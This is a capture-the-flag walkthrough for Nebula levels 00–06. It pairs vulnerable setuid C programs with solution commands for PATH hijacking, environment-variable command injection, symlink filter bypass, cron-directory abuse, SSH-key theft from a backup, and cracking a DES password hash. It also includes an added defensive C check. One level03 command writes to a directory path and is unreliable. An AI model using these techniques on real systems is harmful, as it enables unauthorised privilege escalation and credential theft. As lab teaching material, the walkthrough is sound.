Nebula level00
About
This level requires you to find a Set User ID program that will run as the "flag00" account. You could also find this by carefully looking in top-level directories in / for suspicious-looking directories.
Alternatively, look at the find man page.
To access this level, log in as level00 with the password of level00.
Source code
There is no source code available for this level.
$ find / -user flag00 2> /dev/null
Nebula level01
About
There is a vulnerability in the program below that allows arbitrary programs to be executed. Can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.
Source code
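#define _GNU_SOURCE   /* for setresgid()/setresuid() */
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    /* Make the real and saved IDs match the effective (flag01) IDs */
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* env looks up "echo" through the caller-controlled PATH */
    system("/usr/bin/env echo and now what?");
}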
$ echo 'getflag' > /tmp/echo
$ chmod a+x /tmp/echo
$ export PATH='/tmp:'$PATH
$ /home/flag01/flag01
Nebula level02
About
There is a vulnerability in the program below that allows arbitrary programs to be executed. Can you find it?
To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.
Source code
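#define _GNU_SOURCE   /* for asprintf() and setresgid()/setresuid() */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char **argv, char **envp)
{
    char *buffer;
    gid_t gid;
    uid_t uid;

    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    buffer = NULL;

    /* USER comes from the caller's environment and is pasted into a shell command */
    asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
    printf("about to call system(\"%s\")\n", buffer);

    system(buffer);
}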
$ export USER='getflag
'
$ /home/flag02/flag02
$ export USER='&& getflag &&'
$ export USER=';getflag;'
Nebula level03
About
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Source code
There is no source code available for this level.
$ echo 'getflag > /tmp/flag03' > /home/flag03/writable.d/
$ cat /tmp/flag03
Nebula level04
About
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.
Source code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>

int main(int argc, char **argv, char **envp)
{
    char buf[1024];
    int fd, rc;

    if(argc == 1) {
        printf("%s [file to read]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* Filters on the name passed in, not on the file that gets opened */
    if(strstr(argv[1], "token") != NULL) {
        printf("You may not access '%s'\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    fd = open(argv[1], O_RDONLY);
    if(fd == -1) {
        err(EXIT_FAILURE, "Unable to open %s", argv[1]);
    }

    rc = read(fd, buf, sizeof(buf));
    if(rc == -1) {
        err(EXIT_FAILURE, "Unable to read fd %d", fd);
    }

    write(1, buf, rc);
}
$ ln -s /home/flag04/token /tmp/flag04
$ /home/flag04/flag04 /tmp/flag04
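The symlink gets through because flag04 tests the string in argv[1], not the file that open() ends up reaching. The following is an added example, not part of the original level or this walkthrough, of making the decision on the opened descriptor instead; open_unless_protected and demo are hypothetical names, and the temp-directory fixture is constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` read-only unless it is the same file as `protected_path`.
 * The check is made on the opened descriptor (device + inode), not on the
 * name, so a symlink, hard link or alternate path cannot dodge it.
 * Returns an fd, or -1 if refused or on error (fails closed). */
int open_unless_protected(const char *path, const char *protected_path)
{
    struct stat want, got;
    int fd;
    if (stat(protected_path, &want) == -1)
        return -1;
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC); /* no final symlink */
    if (fd == -1)
        return -1;
    if (fstat(fd, &got) == -1 || !S_ISREG(got.st_mode) ||
        (got.st_dev == want.st_dev && got.st_ino == want.st_ino)) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed fixture: a temp dir holding token, a symlink and a hard link
 * to it, and an unrelated file. Returns one bit per path that was opened. */
int demo(void)
{
    char dir[] = "/tmp/l04XXXXXX";
    const char *names[] = { "token", "sym", "hard", "notes" };
    int i, fd, opened = 0;
    if (!mkdtemp(dir) || chdir(dir) == -1)
        return -1;
    close(open("token", O_CREAT | O_WRONLY, 0600));
    close(open("notes", O_CREAT | O_WRONLY, 0600));
    if (symlink("token", "sym") == -1 || link("token", "hard") == -1)
        return -1;
    for (i = 0; i < 4; i++) {
        fd = open_unless_protected(names[i], "token");
        if (fd != -1) { opened |= 1 << i; close(fd); }
    }
    return opened;   /* 8: only bit 3 ("notes") is set */
}

int main(void) { printf("opened mask: %d\n", demo()); return 0; }
```

A check like this is defence in depth; the token should also not be readable by the ID the program runs with unless it is meant to be served.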
Nebula level05
About
Check the flag05 home directory. You are looking for weak directory permissions.
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Source code
There is no source code available for this level.
$ cp /home/flag05/.backup/backup-*.tgz /tmp/backup.tgz
$ gunzip backup.tgz
$ tar -xvf backup.tar
$ cp /tmp/.ssh/* /home/level05/.ssh/
$ ssh flag05@127.0.0.1
Nebula level06
About
The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.
Source code
There is no source code available for this level.
$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
root@bt:/pentest/passwords/john# echo ' ueqwOCnSGdsuM' > pass.txt
root@bt:/pentest/passwords/john# ./john pass.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello (?)
guesses: 1 time: 0:00:00:00 DONE (Mon Jun 10 00:57:27 2013) c/s: 1828 trying: 123456 - marley
Use the "--show" option to display all of the cracked passwords reliably
root@bt:/pentest/passwords/john# ./john pass.txt --show
?:hello
1 password hash cracked, 0 left